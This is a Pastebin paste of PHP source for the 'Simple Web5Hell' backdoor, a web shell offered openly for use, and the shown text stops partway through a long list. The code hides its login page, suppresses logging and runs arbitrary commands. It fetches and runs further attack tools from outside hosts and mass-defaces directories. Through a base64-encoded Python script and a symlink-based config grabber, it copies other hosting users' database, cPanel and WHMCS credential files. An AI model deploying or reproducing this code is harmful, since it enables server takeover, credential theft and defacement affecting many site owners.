AZZATSSINS_CYBERSERK

SIMPLE WEB5HELL BACKDOOR V3.05

Jun 19th, 2016
332
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 86.22 KB | None | 0 0
  1. <?php
  2. /*
  3. Simple Web5Hell Linux/Unix By © AZZATSSINS CYBERSERKERS
  4. Login Page: file.php?god=damn
  5. Default Password: A/Z
  6. You Can ReCoded But Don't Change CopyRight
  7. example: ReCoded By XXXXX & © AZZATSSINS
  8. */
  9. $auth_pass = "ed4544d345562697a49e5cfc6a8ab545";
  10. $color = "#00ff00";
  11. $default_action = 'FilesMan';
  12. @define('SELF_PATH', __FILE__);
  13. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  14.     header('HTTP/1.0 403');
  15.     exit;
  16. }
  17. @session_start();
  18. @error_reporting(0);
  19. @ini_set('error_log',NULL);
  20. @ini_set('log_errors',0);
  21. @ini_set('max_execution_time',0);
  22. @ini_set('display_errors', 0);
  23. @set_time_limit(0);
  24. @set_magic_quotes_runtime(0);
  25. @define('VERSION', '2.1');
  26. if( get_magic_quotes_gpc() ) {
  27.     function stripslashes_array($array) {
  28.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  29.     }
  30.     $_POST = stripslashes_array($_POST);
  31. }
  32. function echoLogin() {
  33. header('HTTP/1.0 404 Not Found');
  34. if($_GET['god']=="damn"){
  35. echo'<style>
  36.        input { margin:0;background-color:#fff;border:1px solid #fff; }
  37.    </style>
  38.    <center>
  39.    <input type=password name=lol><br>
  40.    <input type=password name=lol><br>
  41.    <input type=password name=lol><br>
  42.    <input type=password name=lol><br>
  43.    <form method=post>
  44.    <input type=password name=pass>
  45.    </form><br>
  46.    <input type=password name=lol><br>
  47.    <input type=password name=lol><br>
  48.    <input type=password name=lol><br>
  49.    <input type=password name=lol><br>
  50.    </center>';
  51.     }
  52.     exit;
  53. }
  54. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  55.     if( empty( $auth_pass ) ||
  56.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  57.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  58.     else
  59.         echoLogin();
  60.  
  61. @error_reporting(0);
  62. @ini_set('output_buffering',0);
  63. @ini_set('display_errors', 0);
  64. @ini_set('log_errors',0);
  65. /*
  66. SIMPLE WEB5HELL V3.6
  67. Script Edited By AZZATSSINS CYBERSERKERS (Editor/Author)
  68. Email : Cyberserkers@gmail.com
  69. Twitter : @AZZATSSINS
  70. Facebook: /AZZATSSINS.CYBERSERKERS
  71. VK: /azzatssins
  72. Dont Change ©Author/Editor® ^_^
  73. */
  74. echo "<title>SIMPLE WEB5HELL</title><style type='text/css'>body {
  75. background-image:url(https://scontent-amt2-1.xx.fbcdn.net/t31.0-8/fr/cp0/e15/q65/13161748_2018079475084811_4250834144748309831_o.jpg);background-position:center;background-color:#414141; }</style>
  76. <center><br><div style='background:#d400f4;margin:0px;padding:2px;text-align:center;color:#202020;'><b><i><div style='background:red;margin:0px;padding:0px;text-align:center;color:white;'>[<a href='?'>HOME</a>] [<a href='?mysql=connect'>MYSQL</a>] [<a href='?whmcs=decode'>WHMCS DECODER</a>] [<a href='?WHMCS=REMOTE'>WHMCS REMOTE</a>] [<a href='?whmcs=killer'>WHMCS KILLER</a>] [<a href='?whmcs=shell'>WHMCS INJECT</a>] [<a href='?whmcs=client'>WHMCS CLIENT</a>] [<a href='?ceck=whmcs'>WHMCS CECK</a>] [<a href='?whmcs=token'>BYPASS TOKEN</a>] [<a href='?AZZATSSINS=CONFIGRABBER'>CONFIG</a>]</div><br><div style='background:silver;margin:0px;padding:0px;text-align:center;color:red;'>[<a href='?AZZATSSINS=encrypt'>ENCRYPTIONS</a>] [<a href='?md5=decrypter'>DECRYPTIONS</a>] [<a href='?open=ports'>OPEN PORT</a>] [<a href='?AZZATSSINS=JPASS'>JOOMLA LOGIN</a>] [<a href='?AZZATSSINS=WPASS'>WORDPRESS LOGIN</a>] [<a href='?traindt=login'>TRAINDT LOGIN</a>] [<a href='?nuke=login'>NUKE LOGIN</a>] [<a href='?AZZATSSINS=BOMAIL'>BOMAIL</a>]</div><br><div style='background:#3a3a3a;margin:0px;padding:0px;text-align:center;color:#202020;'><form method='POST'><input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins1' value='CONFIG'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins2' value='JUMPING'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins3' value='SYMLINK 01'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins4' value='SYMLINK 02'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssinsym' value='SYMLINK 03'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssinsyml' value='SYMLINK 04'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins5' value='BYPASS FUN'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins7' value='SERVER VULN'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins9' value='MASSDEFACE'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='cyberserkers2' value='WPMASS'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='cyberserkers3' value='PERLSHELL'> <input style='width:15%;height:23px;background:#e6e6e6;border:0;padding:0;margin:0;color:#7f7f7f;' type='submit' name='azzatssins8' value='HIDE UR ASS'></i></b><br></form></div>";
  77. $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
  78. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
  79.  
  80. $SCWD   = `pwd`;
  81.  
  82. if( $currentWD == "" ) {
  83.     $currentWD = $SCWD;
  84. }
  85.  
  86.  
  87. if( $_POST['_act'] == "List files!" ) {
  88.     $currentCMD = "ls -la";
  89. }
  90.  
  91. echo "<div style='background:orange;margin:0px;padding:0px;text-align:center;color:#202020;'><br><form method=post enctype=\"multipart/form-data\"><table>";
  92.  
  93. echo "<tr><td><b>Execute command:</b></td><td><input size=30 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
  94. echo "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
  95.  
  96. echo "<tr><td><b>Change directory:</b></td><td><input size=30 name=\"_cwd\" value=\"".$currentWD."\"></td>";
  97. echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
  98.  
  99. echo "<tr><td><b>Upload file:</b></td><td><input size=15 type=file name=_upl></td>";
  100. echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
  101.  
  102. echo "</table></form>";
  103. echo"</div></div></center>";
  104. if($_GET['whmcs']=="killer"){
  105. $get = file_get_contents('http://wget.yu.tl/files/whmcs-killer.css');
  106. $bwt = fopen('wk.php', 'w');
  107. fwrite($bwt,$get);
  108. fclose($bwt);
  109. echo'<meta http-equiv="Refresh" content= "0; url=wk.php">'; }
  110. if($_POST['cyberserkers2']){
  111. $get = file_get_contents('http://wget.yu.tl/files/wp-mas.css');
  112. $bwt = fopen('wpm.php', 'w');
  113. fwrite($bwt,$get);
  114. fclose($bwt);
  115. echo'<meta http-equiv="Refresh" content= "0; url=wpm.php">';
  116.  }
  117.  if($_POST['cyberserkers3']){
  118. $get = file_get_contents('http://pastebin.com/raw/5trLjPyh');
  119. $bwt = fopen('cgi.pl', 'w');
  120. fwrite($bwt,$get);
  121. fclose($bwt);
  122. chmod('cgi.pl',0755);
  123. echo'<meta http-equiv="Refresh" content= "0; url=cgi.pl">';
  124.  }
  125. if($_POST['azzatssins9']){
  126.  ?>
  127. <br><center><b><i><form ENCTYPE="multipart/form-data" method=post>
  128. Folder : <input typ=text name=path size=20 value="<?=getcwd();?>">
  129. <br>
  130. Nama File : <input typ=text name=file size=20 value="index.htm">
  131. <br>URL Script :
  132. <input typ=text name=url size=30 value="http://wget.yu.tl/files/lol.css">
  133. <br>
  134. <input type=submit value=Deface>
  135. </form></i></b></center>
  136. <?php
  137.  $path=$_POST[path];
  138.  $file=$_POST[file];
  139.  $script=$_POST[url];
  140.  $dir=opendir("$path");
  141.  while($row=readdir($dir))
  142.  {
  143.  $start=@fopen("$row/$file","w+");
  144.  $code=@file_get_contents($script);
  145.  $finish=@fwrite($start,$code);
  146.  if ($finish)
  147.  {
  148.  echo "$row/$file > Done<br><br>";
  149.  }
  150. } /*MassDeface by AZZATSSINS*/
  151. }
  152. if($_POST['azzatssinsyml']){
  153. $py =base64_decode('Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCg0Kb3MubWFrZWRpcnMoJ3NsJykNCm9zLmNoZGlyKCdzbCcpDQoNCnN1c3I9W10NCnNpdGV4PVtdDQpvcy5zeXN0ZW0oImxuIC1zIC8gQVpaQVRTU0lOUyIpDQoNCmggPSAiT3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzXG5EaXJlY3RvcnlJbmRleCBzbFxuQWRkVHlwZSB0ZXh0L3BsYWluIC5waHBcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiDQptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQ0KbS53cml0ZShoKQ0KbS5jbG9zZSgpDQpwcmludCBodGENCg0Kc2YgPSAiPHRpdGxlPlN5bWJvbGljIExpbmtzPC90aXRsZT48Ym9keSBiZ2NvbG9yPWJsYWNrPjxjZW50ZXI+PGJyPjxkaXYgc3R5bGU9YmFja2dyb3VuZDptYXJvb247bWFyZ2luOjBweDtwYWRkaW5nOjRweDt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjpzaWx2ZXI7PjxpPjxmb250IGNvbG9yPWxpbWU+JmNvcHk7IDwvZm9udD48YSBocmVmPW1haWx0bzpjeWJlcnNlcmtlcnNAZ21haWwuY29tPkFaWkFUU1NJTlMgQ1lCRVJTRVJLRVJTPC9hPjwvaT48YnI+PGJyPjxicj48L2NlbnRlcj4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJzeW1saW5rLmh0bSIsInciKQ0KaXBzLndyaXRlKHNmKQ0KDQpmb3IgZnVzciBpbiBzdXNyOg0KCWZvciBmc2l0ZSBpbiBzaXRleDoNCgkJZnU9ZnVzclswOjVdDQoJCXM9ZnNpdGVbMDo1XQ0KCQlpZiBmdT09czoNCgkJCWlwcy53cml0ZSgiPGJyPjxicj48Y2VudGVyPjxicj48ZGl2IHN0eWxlPWJhY2tncm91bmQ6dmlvbGV0O21hcmdpbjowcHg7cGFkZGluZzo1cHg7dGV4dC1hbGlnbjpjZW50ZXI7Y29sb3I6d2hpdGU7PjxiPjxpPjxmb250IGNvbG9yPXNpbHZlcj48Zm9udCBjb2xvcj1saW1lPiVzPC9mb250PiB8IDxmb250IGNvbG9yPW9yYW5nZT4lczwvZm9udD4gfCA8YSBocmVmPUFaWkFUU1NJTlMvaG9tZS8lcyVzIHRhcmdldD1fYmxhbmsgPiVzPC9hPjwvZm9udD48L2k+PC9iPjwvZGl2PjwvY2VudGVyPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQ0KCQkJY291bnRlcj1jb3VudGVyKzE=');
  154. $pys = fopen("symlink.py","w+");
  155. fwrite($pys,$py);
  156. system('python symlink.py');
  157. system('rm symlink.py');
  158. echo'<meta http-equiv="Refresh" content= "0; url=sl/symlink.htm">';
  159. }
  160. if($_POST['azzatssinsym']){
  161. @session_start();
  162. @set_time_limit(0);
  163. @ini_set('max_execution_time',0);
  164. @mkdir('xazsx',0777);
  165. $sempak  = "Options +FollowSymLinks
  166. \nDirectoryIndex azzatssins.shtml
  167. \nRemoveHandler .php
  168. \nAddType application/octet-stream .php";
  169. $masuk =@fopen ('xazsx/.htaccess','w');
  170. fwrite($masuk ,$sempak);
  171. @symlink('/','xazsx/azzatssins.txt');  
  172. $pg = basename(__FILE__);
  173.  
  174.  
  175. if(is_readable("/var/named")){
  176. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  177. <td align="center"> <font color="white"> <b>DOMAINS</b></td>
  178. <td align="center"> <font color="white"> <b>USERS</b></td>
  179. <td align="center"> <font color="white"> <b>SYMLINK</b></center></td>';
  180. $list = scandir("/var/named");
  181. foreach($list as $domain){
  182. if(strpos($domain,".db")){
  183. @error_reporting(0);
  184. @ini_set('log_errors',0);
  185. @ini_set('error_log',NULL);
  186.  
  187. $i += 1;
  188. $domain = str_replace('.db','',$domain);
  189. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  190. echo "<tr>
  191. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
  192. <td align='center'><font color='white'>".$owner['name']."</td>
  193. <td align='center'><a href='xazsx/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  194. }
  195. }
  196. flush();
  197. flush();
  198. }
  199. echo "</tr></table></div></html>";
  200.  
  201. }
  202. if($_POST['azzatssins1']){
  203. /*Simple Config Grabber With Copy File Method By AZZATSSINS CYBERSERKERS*/
  204. //$us = file_get_contents("/etc/passwd");
  205. $usa = fopen('/etc/passwd','r');
  206. $dir = mkdir('AZZATSSINS', 0777);
  207. $rrrr = "Options all \n DirectoryIndex AZZATSSINS \n Require None \n Satisfy Any";
  208. $frr = fopen('AZZATSSINS/.htaccess', 'w');
  209. fwrite($frr, $rrrr);
  210. while($us = fgets($usa)){
  211.  if($us==""){
  212.  echo "<font color=red>can't read /etc/passwd</font>";
  213.  }
  214. else{
  215.  preg_match_all('/(.*?):x:/', $us, $user_byk);
  216.  foreach($user_byk[1] as $user){
  217.  $dir1 = "/home/$user/public_html/";
  218. if(is_readable($dir1)){
  219.  
  220. system('cp '.$dir1.'wp-config.php AZZATSSINS/'.$user.'-WPS.txt');
  221. system('cp '.$dir1.'configuration.php AZZATSSINS/'.$user.'-CMS.txt');
  222. system('cp '.$dir1.'config.php AZZATSSINS/'.$user.'-ETC.txt');
  223. system('cp /home/'.$user.'/.my.cnf AZZATSSINS/'.$user.'-CP.txt');
  224. system('cp /home/'.$user.'/.accesshash AZZATSSINS/'.$user.'-WHM.txt');
  225. }
  226. else{
  227.     }
  228. }
  229. }
  230.  
  231. } system('rm AZZATSSINS/.htaccess');
  232.  
  233. echo'<meta http-equiv="Refresh" content= "0; url=AZZATSSINS">'; }
  234. if($_GET['mysql']=="connect"){
  235. $get = file_get_contents('http://wget.yu.tl/files/mysql.css');
  236. $bwt = fopen('mysql.php', 'w');
  237. fwrite($bwt,$get);
  238. fclose($bwt);
  239. echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
  240. }
  241. if($_GET['WHMCS']=="REMOTE"){
  242. $get = file_get_contents('http://wget.yu.tl/files/ah.css');
  243. $bwt = fopen('rw.php', 'w');
  244. fwrite($bwt,$get);
  245. fclose($bwt);
  246. echo'<meta http-equiv="Refresh" content= "0; url=rw.php">';
  247. }
  248.  
  249. if($_GET['AZZATSSINS']=="CONFIGRABBER"){
  250.  ?>
  251. <title>ConfiGrabber V3.2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  252. "><br>Your Folder  : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
  253. <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
  254. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  255. if ($_POST['conf']) {
  256. $folfig = $_POST['folfig'];
  257. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
  258. @mkdir($folfig, 0755);
  259. @chdir($folfig);
  260. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
  261. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  262. $passwd=explode("\n",$_POST["passwd"]);
  263. foreach($passwd as $pwd){ $user=trim($pwd);
  264. symlink('/','000~ROOT~000');
  265. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  266. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  267. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  268. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  269. copy('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  270. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  271. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
  272. copy('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  273. copy('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  274. copy('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  275. copy('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  276. copy('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  277. copy('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  278. copy('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  279. copy('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  280. copy('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  281. copy('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  282. copy('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  283. copy('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  284. copy('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  285. copy('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  286. copy('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  287. copy('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  288. copy('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  289. copy('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  290. copy('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  291. copy('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  292. copy('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  293. copy('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  294. copy('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  295. copy('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  296. copy('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  297. copy('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  298. copy('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  299. copy('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  300. copy('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  301. copy('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  302. copy('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  303. copy('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  304. copy('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  305. copy('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  306. copy('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  307. copy('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  308. copy('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  309. copy('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  310. copy('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  311. copy('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  312. copy('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  313. copy('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  314. copy('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  315. copy('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  316. copy('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  317. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  318. copy('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  319. copy('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  320.  
  321. copy('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  322. copy('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  323. copy('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  324. copy('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  325. copy('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  326. copy('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  327. copy('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  328. copy('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  329. copy('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  330. copy('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  331. copy('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  332. copy('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  333. copy('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  334. copy('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  335. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  336. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  337. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  338. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  339. symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  340. symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  341. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  342. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  343. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  344. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  345. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  346. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  347. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  348. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  349. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  350. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  351. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  352. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  353. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  354. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  355. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  356. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  357. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  358. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  359. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  360. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  361. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  362. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  363. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  364. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  365. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  366. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  367. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  368. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  369. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  370. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  371. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  372. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  373. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  374. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  375. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  376. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  377. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  378. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  379. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  380. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  381. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  382. symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  383.  
  384. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  385. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  386. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
